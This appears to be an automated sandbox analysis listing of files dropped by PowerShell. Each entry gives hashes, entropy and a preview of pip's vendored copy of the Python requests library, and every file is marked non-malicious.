                                                                                                    Preview:........=.Cf................................d.a.d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..i.d%d&..d'd(..d)d*..d+d,..d-d...d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF....i.dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh....i.didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d...d.d...d.d.....Z...e.d...........Z.d...Z...e...........y.).a.....The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5628
                                                                                                    Entropy (8bit):5.152326641502406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:R1jg0JgabXXARqiARZhlEgOFZmzuUNN/PVxA:RRg0JrbXXAXIfxO3mXrk
                                                                                                    MD5:604EEE0A52035BE7A0A7DC8A660BAB0C
                                                                                                    SHA1:ECB72A05BB38F2A1A9690F8414292FD972CCD584
                                                                                                    SHA-256:9B9B992FB31E8E91A6E24C5C7E683D01FDE8439A7F02D9E607DE28408135E0CF
                                                                                                    SHA-512:2CE1F4715E15B2BA60D60A28C0420DC46ECAE57F1DFB9986BD2C6ACCB5CF826233A3337CBDFF3E95881500447BDB30D0A0B318C21DA329D9D2F8EAA3D18C9FBD
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf`.........................P.....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z.y.).zO.requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.......)...OrderedDict.....)...Mapping..MutableMappingc.....................N.....e.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...CaseInsensitiveDicta....A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json' # True.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36280
                                                                                                    Entropy (8bit):5.563292658097082
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:MqXg2CM20kK4w6aQCzydwmbuGhTH32dpEWEEzyso5V3s:Me1CYkJa4dHuGhTHGdnEEzyss8
                                                                                                    MD5:E11BF50A10B3433999882908D32DC391
                                                                                                    SHA1:326D957AF560D4C363B3C38E49C6D2B4AB1206DC
                                                                                                    SHA-256:3B3771BEFEB160B7F18CD935E38A98DDB3CFA4726FA64942A94B174B126105E5
                                                                                                    SHA-512:92777F2903405C30AAC9E223244A2B090C8B82DE3C5444EB09228FCB24497F235BEC15147E15AFD7F9755A0A96AD07BFE76AD5960D3BDE9B721DBD5EE00C37F3
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................Z.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2..e.jf..........................Z4d.d.d...Z5d.jm....................e.jn..................d...e.d...........d.....................Z8e.jr..................d.k(..r.d...Z:d...Z"d...Z;d...Z<dHd...Z=d...Z>d...Z?e.j...................d ..........ZAd!..ZBd"..ZCd#..ZDd$..ZEdHd%..ZFd&..ZGd'..ZHd(..ZId)..ZJd*..ZKd+..ZLd,..ZMd-..ZN..eOd.........ZPd/..ZQd0..ZRd1..ZSd2..ZTd3..ZUd4..ZVe.j...................d5..........ZWd6..ZXdId7..ZYd8..ZZdJd9..Z[dKd:..Z\d;..Z]d<..Z^d=j...................d>........Z`e`d?z...Zae`d@z...ZbdA..ZcdB..ZddC..ZedD..ZfdE..ZgdF..ZhdG..Ziy.)Lz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):435
                                                                                                    Entropy (8bit):4.92644594167572
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:PbfvK6kUFu7/svcTMIxSu6AbzuEFhtRH3RX0T:Tfvqcq/svcxSu6AvbRH3RX0T
                                                                                                    MD5:6393CB210C95B7321847C97FB29F37AD
                                                                                                    SHA1:98551B7B5437E725ED4ED631DC9C448B0432FFCD
                                                                                                    SHA-256:B2C237133B7B3DAC6090E5B8E4686DC0F51C968FD23BFCA0B489B803BE0839FC
                                                                                                    SHA-512:D45127407718FC33767B28ADD44604360E432264CCB88AF8BFF19C9A1457331FDB76910A7F698BDFF822769A863DB442CA7066631E9D2651AEB5547FE20F7F77
                                                                                                    Malicious:false
                                                                                                    Preview:# .-. .-. .-. . . .-. .-. .-. .-..# |( |- |.| | | |- `-. | `-..# ' ' `-' `-`.`-' `-' `-' ' `-'..__title__ = "requests".__description__ = "Python HTTP for Humans.".__url__ = "https://requests.readthedocs.io".__version__ = "2.31.0".__build__ = 0x023100.__author__ = "Kenneth Reitz".__author_email__ = "me@kennethreitz.org".__license__ = "Apache 2.0".__copyright__ = "Copyright Kenneth Reitz".__cake__ = "\u2728 \U0001f370 \u2728".
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1495
                                                                                                    Entropy (8bit):5.15366805062305
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:+fmQURGWIgQiMhTzcnsIarYO09+gioikIxFYIhARWr1OlX4N8oQdYvf8P:ImpGWf0zcnXarYOSCRhvr1OlX4NlQ88P
                                                                                                    MD5:9DFFF48651AD4C1CD36B1229E869D749
                                                                                                    SHA1:83A8612A7FE67477B5D61A8C4358D22D5B099F7E
                                                                                                    SHA-256:9CC4329ABE21B37D93A95A3901B0AB99C24486F3D487BC57965BB2AB0B252E24
                                                                                                    SHA-512:8BC4699BFFE4B41B11FF43EEF9CF33B668127DB9F58D8DB0EA6105150B01C7472E2CF6E834A0F45133F33AF9A54AEBE3B1399EDE383109D7D01F59455DB61001
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat).""".import re..from .compat import builtin_str.._VALID_HEADER_NAME_RE_BYTE = re.compile(rb"^[^:\s][^:\r\n]*$")._VALID_HEADER_NAME_RE_STR = re.compile(r"^[^:\s][^:\r\n]*$")._VALID_HEADER_VALUE_RE_BYTE = re.compile(rb"^\S[^\r\n]*$|^$")._VALID_HEADER_VALUE_RE_STR = re.compile(r"^\S[^\r\n]*$|^$").._HEADER_VALIDATORS_STR = (_VALID_HEADER_NAME_RE_STR, _VALID_HEADER_VALUE_RE_STR)._HEADER_VALIDATORS_BYTE = (_VALID_HEADER_NAME_RE_BYTE, _VALID_HEADER_VALUE_RE_BYTE).HEADER_VALIDATORS = {. bytes: _HEADER_VALIDATORS_BYTE,. str: _HEADER_VALIDATORS_STR,.}...def to_native_string(string, encoding="ascii"):. """Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. """. if
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19697
                                                                                                    Entropy (8bit):4.481896758913148
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:CmaK41rfA73TObWjr89828eaCYWjRhqnnJ8vKF8eXRuxCAiO:oLta3iqVxCuCvKF8eXRuxCAiO
                                                                                                    MD5:FD51D2017E40F065FFC096C1EA4529EF
                                                                                                    SHA1:A8044515493C0E34203EB9F820A6341B33BDE89A
                                                                                                    SHA-256:89D8FA7197087772F9C4D35E27B89E38BB70DDAC0993903AE3151F7AD1F0AB73
                                                                                                    SHA-512:A0D354859B6FAF64225D6CD75BC468FDA6D64BBFC564147D725D1A6A2379AB4E314D004FDA49F7A7C138A633D94651EA582621A5529BC5F74F96C5A13B2E1517
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.."""..import os.path.import socket # noqa: F401..from pip._vendor.urllib3.exceptions import ClosedPoolError, ConnectTimeoutError.from pip._vendor.urllib3.exceptions import HTTPError as _HTTPError.from pip._vendor.urllib3.exceptions import InvalidHeader as _InvalidHeader.from pip._vendor.urllib3.exceptions import (. LocationValueError,. MaxRetryError,. NewConnectionError,. ProtocolError,.).from pip._vendor.urllib3.exceptions import ProxyError as _ProxyError.from pip._vendor.urllib3.exceptions import ReadTimeoutError, ResponseError.from pip._vendor.urllib3.exceptions import SSLError as _SSLError.from pip._vendor.urllib3.poolmanager import PoolManager, proxy_from_url.from pip._vendor.urllib3.util import Timeout as TimeoutSauce.from pip._vendor.urllib3.util import parse_url.from pip._vendor.urllib3.util.retry import Retry..from .auth import
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6449
                                                                                                    Entropy (8bit):4.805063878988985
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:FfmGLluXWC7ZolNAzj8t8l8DQNQmsh4UiGmQb1UAGmQxSUDGmQTQj:FuEoZjM8SkSBKx0b1P0xSc0Uj
                                                                                                    MD5:2788B72CC0F3D6392C126F7A78C76B26
                                                                                                    SHA1:783D802BE4E0EF6483063A3043C0413C201A64C4
                                                                                                    SHA-256:ABAD71717AB8B668889ABBDC4952D36C5C82883D85F8BFFE8562866F3E32F2F8
                                                                                                    SHA-512:44749F4DDE702DE352318E50F90B8DE48A29C2A878657FAD29A6C758BC78341ECBA4FC2DC86D882C57141CA03D304C8746833D1B3A6F8A05D7FB9ED797A2C81A
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.."""..from . import sessions...def request(method, url, **kwargs):. """Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`.. :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`.. :param cookies: (optional) Dict or CookieJar obje
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10187
                                                                                                    Entropy (8bit):4.530751757170063
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:zVDpNQFSzkbBr/Pwrbp61OsAZnA6Mkd8x91u+9PwX:hT2SIV/AinAZnAPkd8x9D9K
                                                                                                    MD5:F9967D6B03B8B2B12D7832A56077BF7E
                                                                                                    SHA1:4E2A84BC60A655EF478C78ADBC6B43FAE762AF9F
                                                                                                    SHA-256:87E1CB955C7D8FCACA57985F480C9C3F60293928254F3EFB474B73EEA09B6C41
                                                                                                    SHA-512:C1DBB2E64518D327F32F7AD2C1176654CA394AA54D1D625BC26DBE10F47C161F31272ABEFE6B794F68B3F309A7DA1CF43D9ED275BDD5484AF6AE1AD42722167F
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.."""..import hashlib.import os.import re.import threading.import time.import warnings.from base64 import b64encode..from ._internal_utils import to_native_string.from .compat import basestring, str, urlparse.from .cookies import extract_cookies_to_jar.from .utils import parse_dict_header..CONTENT_TYPE_FORM_URLENCODED = "application/x-www-form-urlencoded".CONTENT_TYPE_MULTI_PART = "multipart/form-data"...def _basic_auth_str(username, password):. """Returns a Basic Auth string.""".. # "I want us to put a big-ol' comment on top of it that. # says that this behaviour is dumb but we need to preserve. # it because people are relying on it.". # - Lukasa. #. # These are here solely to maintain backwards compatibility. # for things like ints. This will be removed in 3.0.0.. if not isinstance(username, basestring):. warnings.warn(. "Non-string usernames w
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):575
                                                                                                    Entropy (8bit):4.934421807547222
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Hj1A3Dj4uIy1XfB4A4kvYa4ZkfR+E8rC0QhKbW2pHhu:DgbXKAhwa9fD8YKHpE
                                                                                                    MD5:9479D3B9C5E5AAF2F1B5DF8D71938126
                                                                                                    SHA1:75406468389902A6D906E6E516A00485D171D33B
                                                                                                    SHA-256:3D53E8A01D233F986464450B482C02D3BE39DF65056D1D8FB60BB4239CF0982B
                                                                                                    SHA-512:6EF471A5F76B16E0AD22685D51EE3D64D6BB7DFDB4397D8A1825521BB977BC4C181ECFE000805E04B49A0B4BA99123E0C1C8217727D56C6DA6E45C2B8F2EA183
                                                                                                    Malicious:false
                                                                                                    Preview:#!/usr/bin/env python..""".requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.."""..import os..if "_PIP_STANDALONE_CERT" not in os.environ:. from pip._vendor.certifi import where.else:. def where():. return os.environ["_PIP_STANDALONE_CERT"]..if __name__ == "__main__":. print(where()).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1286
                                                                                                    Entropy (8bit):4.8500973853032345
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:+QGX0yyOMmyRFIdUpWBNXirhl06ralDJRqE9AyKQbxAqM5qKwN8tZ9VU7dgxa:DGXHyOLyRnkNXiX7SDJRqDyTK3Vw6lw
                                                                                                    MD5:48EC2C859E45459FA18019C1DAE15C49
                                                                                                    SHA1:DE2DC8F513051C4F6D9A93D6BE4D33C4D65B3E40
                                                                                                    SHA-256:2212BDAAEC97D1146E59335C83A7762464803946CCEA6CA6DA9FF65E32D3C1FE
                                                                                                    SHA-512:6BD847D7BD17C5C6A6D1532D767F7FF105EA18A1E4C222422EA9ADC8119565240787B0D9669F3278A96BC851462E09D41CD3F1401030E301757DB4B1AFE9907E
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.compat.~~~~~~~~~~~~~~~..This module previously handled import compatibility issues.between Python 2 and Python 3. It remains for backwards.compatibility until the next major version.."""..from pip._vendor import chardet..import sys..# -------.# Pythons.# -------..# Syntax sugar.._ver = sys.version_info..#: Python 2.x?.is_py2 = _ver[0] == 2..#: Python 3.x?.is_py3 = _ver[0] == 3..# Note: We've patched out simplejson support in pip because it prevents.# upgrading simplejson on Windows..import json.from json import JSONDecodeError..# Keep OrderedDict for backwards compatibility..from collections import OrderedDict.from collections.abc import Callable, Mapping, MutableMapping.from http import cookiejar as cookielib.from http.cookies import Morsel.from io import StringIO..# --------------.# Legacy Imports.# --------------.from urllib.parse import (. quote,. quote_plus,. unquote,. unquote_plus,. urldefrag,. urlencode,. urljoin,. urlparse,. urlspli
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18560
                                                                                                    Entropy (8bit):4.4459231058062745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:u2XABMUj5PLeaZcA8Jq20Fe6Jo0K8afO+50LfckHMGWjki0pAyEFEHQj:XXAAyAkceoYTQapv6Ea
                                                                                                    MD5:91B27FBF8D78D53BDB214E1E693B7182
                                                                                                    SHA1:0AF89877E7653CE1474E49032E615BD1E2DBC3FA
                                                                                                    SHA-256:903DE43447028FE9B16ED7F97C9B12693F3A786A046290F75F4092829CE5EC13
                                                                                                    SHA-512:B5B461401EC28AD2B7E7867DB819FBC1FACF8366A47855583F565B1174904D008AFB64604B1265EF0EEB60B7BE8623BD7D59C6E76C525927EC9E1158794B306D
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `cookielib.CookieJar` with requests...requests.utils imports from here, so be careful with imports.."""..import calendar.import copy.import time..from ._internal_utils import to_native_string.from .compat import Morsel, MutableMapping, cookielib, urlparse, urlunparse..try:. import threading.except ImportError:. import dummy_threading as threading...class MockRequest:. """Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `cookielib.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of the request and the cookie... The original request object is read-only. The client is responsible for collecting. the new headers via `get_new_headers()` and interpreting them appropriately. You. probably want `get_cookie_header`, defined below.. """.. def __init__(self, request):.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3823
                                                                                                    Entropy (8bit):4.819029564720729
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Yn8BlK2uscIbE2iYoSjfUv5/5hdyioDgjolUvAN:N0IZsUEnIN
                                                                                                    MD5:312E2F6438F6F53662F4CA81C2BEEFDC
                                                                                                    SHA1:1308F42F9E65C10816A1946F6C7B5C692CCA37B2
                                                                                                    SHA-256:140FBF915C016768E15DAB9172D37F7B01D52B6E5BF9F8F4033CB3D531D0D0A9
                                                                                                    SHA-512:8F7953C4A6DA2CF3876D319B4B36ED350902DFC1ED607AC5692BA673478C93847D3C52762EDD3DA09944C98B81EE9E595FE9745EF55792C60816BADEC925A6F1
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions..""".from pip._vendor.urllib3.exceptions import HTTPError as BaseHTTPError..from .compat import JSONDecodeError as CompatJSONDecodeError...class RequestException(IOError):. """There was an ambiguous exception that occurred while handling your. request.. """.. def __init__(self, *args, **kwargs):. """Initialize RequestException with `request` and `response` objects.""". response = kwargs.pop("response", None). self.response = response. self.request = kwargs.pop("request", None). if response is not None and not self.request and hasattr(response, "request"):. self.request = self.response.request. super().__init__(*args, **kwargs)...class InvalidJSONError(RequestException):. """A JSON error occurred."""...class JSONDecodeError(InvalidJSONError, CompatJSONDecodeError):. """Couldn't decode the text into json""".. def __ini
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3879
                                                                                                    Entropy (8bit):4.5792307059613
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:fk7TDYMh2QDBYerRxG3fwf7W149geOWhhrewSMOUFEWGI3Iongi:fkTkQ3wYfq1MOWPrl1Iingi
                                                                                                    MD5:225866FA63EA4FBEA8EF2DB9ABD52163
                                                                                                    SHA1:CDAB1CA78B150D4CB91C453900E4CBB2B00516AD
                                                                                                    SHA-256:167000925BFC3069BFA9BD948A50D0812EA5D1C52DB620852948F1D339F65CD0
                                                                                                    SHA-512:765D3EFCD2F1C1EB303DB76E2743F8BBE9FC20E791197A0A39B18343C4B5FB52DD3874E0B7F18A6C14335657BD0BCE17E9E70D0208B7C0638DCF474A8AA6EB59
                                                                                                    Malicious:false
                                                                                                    Preview:"""Module containing bug report helper(s)."""..import json.import platform.import ssl.import sys..from pip._vendor import idna.from pip._vendor import urllib3..from . import __version__ as requests_version..charset_normalizer = None..try:. from pip._vendor import chardet.except ImportError:. chardet = None..try:. from pip._vendor.urllib3.contrib import pyopenssl.except ImportError:. pyopenssl = None. OpenSSL = None. cryptography = None.else:. import cryptography. import OpenSSL...def _implementation():. """Return a dict with the Python implementation and version... Provide both the name and the version of the Python implementation. currently running. For example, on CPython 3.10.3 it will return. {'name': 'CPython', 'version': '3.10.3'}... This function works best on CPython and PyPy: in particular, it probably. doesn't work for Jython or IronPython. Future investigation should be done. to work out the correct shape of the code for those pla
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):733
                                                                                                    Entropy (8bit):4.520976235953487
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:+x1p4IoWy5pMUqTgEA12TnbxawBCFfy6nu6faadxBIYKzYnhDXrY:+x1qlJ5pMUqTg7wCZy6nu6bBIYHBY
                                                                                                    MD5:94EB29001B47E2886C00D1E201B8733D
                                                                                                    SHA1:6C2AEBE642D6471E70534C45E039DF709B23435D
                                                                                                    SHA-256:0A2BB2B221C0DFD57951F702057148C7CDC8AC3A6EC1F37D45C4D482FDBC7ED4
                                                                                                    SHA-512:15F9F577F2A490427BCFFCA5C217CB8D544431391942264352679174621CF2DB183D293F478083EBA592E1AFF059CF7F41F24AA1538933990819D4B3E49B48A3
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request..""".HOOKS = ["response"]...def default_hooks():. return {event: [] for event in HOOKS}...# TODO: response is the only one...def dispatch_hook(key, hooks, hook_data, **kwargs):. """Dispatches a hook dictionary on a given piece of data.""". hooks = hooks or {}. hooks = hooks.get(key). if hooks:. if hasattr(hooks, "__call__"):. hooks = [hooks]. for hook in hooks:. _hook_data = hook(hook_data, **kwargs). if _hook_data is not None:. hook_data = _hook_data. return hook_data.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35288
                                                                                                    Entropy (8bit):4.358995532413908
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:SKyQloBoXrMuaij97OG2MrjrFem40+XkVbkbiwW:pysuW4uaij97/2M00+XggY
                                                                                                    MD5:ECC4196524D20C2866B5D79C690E2EFD
                                                                                                    SHA1:765765550A634F7A341EB869FE3DBB92C9440421
                                                                                                    SHA-256:74367E893868B64CBE368ABDCB2F7B71410986BDF09D8EA6BFEC51FDE3E0FE59
                                                                                                    SHA-512:3FC0C17791CDF4741A1FCB48CBBD35C8E9B5062EA18C76E84B8D9E0E02A24B32F2D429B88B44222E16BFE07D1E185A0A8952FEF70E9487EE2782F90F10DA4EE9
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.."""..import datetime..# Import encoding now, to avoid implicit import later..# Implicit import within threads may cause LookupError when standard library is in a ZIP,.# such as in Embedded Python. See https://github.com/psf/requests/issues/3578..import encodings.idna # noqa: F401.from io import UnsupportedOperation..from pip._vendor.urllib3.exceptions import (. DecodeError,. LocationParseError,. ProtocolError,. ReadTimeoutError,. SSLError,.).from pip._vendor.urllib3.fields import RequestField.from pip._vendor.urllib3.filepost import encode_multipart_formdata.from pip._vendor.urllib3.util import parse_url..from ._internal_utils import to_native_string, unicode_is_ascii.from .auth import HTTPBasicAuth.from .compat import (. Callable,. JSONDecodeError,. Mapping,. basestring,. builtin_str,. chardet,. cookielib,.).from .compat import json as complexjson.fro
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):695
                                                                                                    Entropy (8bit):4.7385379376049785
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:kyxK21tfkpB7KvEoradNzMk9W5B4XFKW88XCrmW6EpO6zK5IxAKhU8cr0tU:kaQX+YNzM1BsKW8MkmW1p5zK5I2KhUhp
                                                                                                    MD5:4F61660BE0B646E3C7EA1C4DB16FA8C1
                                                                                                    SHA1:F02C00E0F57B81A6EA652F22E4934258F5EF00C7
                                                                                                    SHA-256:9E32665627D8E1A49CB6E5B73CFE441510B18C4C0C4433BA27F7DE1B674A5AC2
                                                                                                    SHA-512:48A737D0ECD5CD35E5F0F960491FD5829AEB2333EE1553817527F0ADCF7FED51B6B645E5DC3D608E90BE1514FBA3EA813A38490B10F892A734565E852DC666DA
                                                                                                    Malicious:false
                                                                                                    Preview:import sys..# This code exists for backwards compatibility reasons..# I don't like it either. Just look the other way. :)..for package in ('urllib3', 'idna', 'chardet'):. vendored_package = "pip._vendor." + package. locals()[package] = __import__(vendored_package). # This traversal is apparently necessary such that the identities are. # preserved (requests.packages.urllib3.* is urllib3.*). for mod in list(sys.modules):. if mod == vendored_package or mod.startswith(vendored_package + '.'):. unprefixed_mod = mod[len("pip._vendor."):]. sys.modules['pip._vendor.requests.packages.' + unprefixed_mod] = sys.modules[mod]..# Kinda cool, though, right?.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30373
                                                                                                    Entropy (8bit):4.4621106606774985
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:7VcaRxATfGGMxzEZwYviFxosm/mk+ulMSh2unB67H9Lu/PMFYyFpyUR4d/haBUaU:7iaRtTxs5vivo9vMSh246L9WPCv4+yl
                                                                                                    MD5:26B35B3254510EBCA8A6C47E0D5B7C95
                                                                                                    SHA1:44FBE35FE96E791DB4EC9204AC99FC461F178155
                                                                                                    SHA-256:F8BBD3CEB3ED7AD493AD1DDBBB1BB85E176032B2452C1D6AE43ECFFBE2F65E1C
                                                                                                    SHA-512:AFEABC632187FA6C618171F9D4367B74AE0E2DAF3BD5C1488573462CBAD7F397308F8B213804D9E581BD74BA529C5D29B6908BA2F38C28A77D03F59A7E3D3EC8
                                                                                                    Malicious:false
                                                                                                    Preview:""".requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies)..""".import os.import sys.import time.from collections import OrderedDict.from datetime import timedelta..from ._internal_utils import to_native_string.from .adapters import HTTPAdapter.from .auth import _basic_auth_str.from .compat import Mapping, cookielib, urljoin, urlparse.from .cookies import (. RequestsCookieJar,. cookiejar_from_dict,. extract_cookies_to_jar,. merge_cookies,.).from .exceptions import (. ChunkedEncodingError,. ContentDecodingError,. InvalidSchema,. TooManyRedirects,.).from .hooks import default_hooks, dispatch_hook..# formerly defined here, reexposed here for backward compatibility.from .models import ( # noqa: F401. DEFAULT_REDIRECT_LIMIT,. REDIRECT_STATI,. PreparedRequest,. Request,.).from .status_codes import codes.from .structures import CaseInsensitiveDict.from .utils import
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4235
                                                                                                    Entropy (8bit):4.816406011231522
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:PlaX6kK/id2KWUZNbpbSjXxQqzqwX5LiOBv8BAzbYR1+5db/g1SpYvpvpIP3xXHy:daXQ/id15JSjXxQgqq/t8BAzb+1+f/PM
                                                                                                    MD5:663DD9E477D4A5FFD451801D2EC2C2BD
                                                                                                    SHA1:530D2BD28F8FE4E40CD40337E86635347E15A65C
                                                                                                    SHA-256:16F1E64F9B87FBFBA29AD473E611FD5426EDED557E35E8B627DBA96DE8FA8FC8
                                                                                                    SHA-512:D265270229AA8C5E803289375C42C8FC6DB5BFEDD3E743EDA041E5D00FBF247C1BF1ED41AF4EE94D5C7F2766253744C55CD662CB4968B35EBDB43299C30A15A0
                                                                                                    Malicious:false
